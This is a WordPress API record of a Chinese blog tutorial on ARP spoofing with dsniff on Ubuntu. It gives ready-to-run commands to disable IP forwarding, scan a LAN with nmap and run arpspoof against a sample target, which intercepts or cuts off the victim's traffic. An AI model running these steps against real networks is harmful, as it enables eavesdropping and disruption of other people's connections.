{"id":328,"date":"2025-04-23T02:09:33","date_gmt":"2025-04-22T18:09:33","guid":{"rendered":"http:\/\/cennum.top\/?p=328"},"modified":"2025-04-24T22:26:50","modified_gmt":"2025-04-24T14:26:50","slug":"arp%e6%94%bb%e5%87%bb","status":"publish","type":"post","link":"https:\/\/cennum.top\/index.php\/2025\/04\/23\/arp%e6%94%bb%e5%87%bb\/","title":{"rendered":"dsniff \u5de5\u5177\u96c61-ubuntu\u4e0b\u5b9e\u73b0ARP\u653b\u51fb"},"content":{"rendered":"\n<h4 class=\"wp-block-heading\">\u4e00.\u5b89\u88c5\u5de5\u5177<\/h4>\n\n\n\n<p>nmap:\u7528\u6765\u626b\u63cf\u5f53\u524d\u5c40\u57df\u7f51\u7684\u8bbe\u5907<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo apt instal nmap<\/code><\/pre>\n\n\n\n<p>dsniff\u5de5\u5177\u96c6<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo apt install dsniff<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">\u4e8c.arp\u653b\u51fb<\/h4>\n\n\n\n<p>ARP\u653b\u51fb\u5373\u5bf9\u76ee\u6807 <code>ip<\/code> \u5192\u5145\u7f51\u5173\uff0c\u76ee\u6807<code>ip<\/code>\u4f1a\u9519\u8bef\u5730\u8ba4\u4e3a\u4f60\u7684\u673a\u5668\uff08\u8fd0\u884c <code>arpspoof<\/code> \u7684\u8bbe\u5907\uff09\u662f\u7f51\u5173\uff0c\u5b83\u53d1\u9001\u7684\u6240\u6709\u6570\u636e\uff08\u6bd4\u5982\u8bbf\u95ee\u7f51\u9875\u3001\u5fae\u4fe1\u7b49\uff09\u90fd\u4f1a\u88ab\u53d1\u7ed9\u4f60\u7684\u8bbe\u5907\uff0c\u4f60\u53ef\u4ee5\u9009\u62e9\u5c06\u8fd9\u4e9b\u6570\u636e\u4e22\u5f03\u6216\u8005\u7ee7\u7eed\u8f6c\u53d1\u7ed9\u8def\u7531\u5668<\/p>\n\n\n\n<p>1.\u5173\u95edubuntu\u7684ip\u8f6c\u53d1<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo sysctl -w net.ipv4.ip_forward=0<\/code><\/pre>\n\n\n\n<p><code>sysctl<\/code>\u662fubuntu\u4e2d\u7528\u4e8e\u914d\u7f6e\u6216\u67e5\u770b\u5185\u6838\u53c2\u6570\u7684\u547d\u4ee4\uff0c\u662f<strong>\u4e34\u65f6<\/strong>\u7684\uff0c\u91cd\u542f\u540e\u6062\u590d\u9ed8\u8ba4\u503c\u3002<\/p>\n\n\n\n<p>-w \u4ee3\u8868\u5199\u5165\u4e00\u4e2a\u65b0\u503c\u3002<\/p>\n\n\n\n<p><code>net.ipv4.ip_forward<\/code> \u7684\u53c2\u6570\u4e3a 1 \u65f6\uff0c\u8868\u793a\u5f00\u542f\u5bf9 IPv4 \u7684\u8f6c\u53d1\u529f\u80fd\uff0c=0\u65f6\u8868\u793a\u4e0d\u5bf9 IPv4 \u6570\u636e\u8fdb\u884c\u8f6c\u53d1\u3002<\/p>\n\n\n\n<p>\u53c2\u6570<code>net.ipv4.ip_forward\u5728\u76ee\u5f55\/etc\/sysctl.conf<\/code>\u4e0b,\u4fee\u6539\u8be5\u6587\u4ef6\u53ef\u6c38\u4e45\u4fee\u6539\u6b64\u53c2\u6570<\/p>\n\n\n\n<p>2.\u626b\u63cf\u5f53\u524d\u5c40\u57df\u7f51\u8bbe\u5907<\/p>\n\n\n\n<p>\u53ef\u4ee5\u5148\u67e5\u770b\u81ea\u5df1\u8bbe\u5907\u7684ipv4\u5730\u5740\uff0c\u6ce8\u610f\u81ea\u5df1\u7684ipv4\u5730\u5740\u548c\u7f51\u5361\u540d\u5b57<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ifconfig<\/code><\/pre>\n\n\n\n<p>\u626b\u63cf\u5f53\u524d\u5c40\u57df\u7f51\u8bbe\u5907<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nmap 192.168.31.0-255<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u4f1a\u626b\u63cf192.168.31\u4e0b0-255\u7684\u8bbe\u5907<\/p>\n\n\n\n<p>3.\u542f\u52a8ARP\u653b\u51fb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo arpspoof -i &lt;\u7f51\u5361\u540d> -t &lt;\u76ee\u6807ip> &lt;\u7f51\u5173><\/code><\/pre>\n\n\n\n<p>\u6bd4\u5982<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo arpspoof -i wlp2s0 -t 192.168.31.76 192.168.31.1<\/code><\/pre>\n\n\n\n<p>\u8f93\u5165\u547d\u4ee4\u540e\u5f00\u59cb\u622a\u53d6\u76ee\u6807ip\u5230\u7f51\u5173\u7684\u6570\u636e\uff0c\u5e76\u4e14\u4e0d\u8fdb\u884c\u8f6c\u53d1\u4f1a\u5bfc\u81f4\u76ee\u6807\u8bbe\u5907\u65ad\u7f51<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00.\u5b89\u88c5\u5de5\u5177 nmap:\u7528\u6765\u626b\u63cf\u5f53\u524d\u5c40\u57df\u7f51\u7684\u8bbe\u5907  &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2,3],"tags":[],"class_list":["post-328","post","type-post","status-publish","format-standard","hentry","category-linux","category-3"],"_links":{"self":[{"href":"https:\/\/cennum.top\/index.php\/wp-json\/wp\/v2\/posts\/328","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cennum.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cennum.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cennum.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cennum.top\/index.php\/wp-json\/wp\/v2\/comments?post=328"}],"version-history":[{"count":4,"href":"https:\/\/cennum.top\/index.php\/wp-json\/wp\/v2\/posts\/328\/revisions"}],"predecessor-version":[{"id":351,"href":"https:\/\/cennum.top\/index.php\/wp-json\/wp\/v2\/posts\/328\/revisions\/351"}],"wp:attachment":[{"href":"https:\/\/cennum.top\/index.php\/wp-json\/wp\/v2\/media?parent=328"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cennum.top\/index.php\/wp-json\/wp\/v2\/categories?post=328"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cennum.top\/index.php\/wp-json\/wp\/v2\/tags?post=328"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}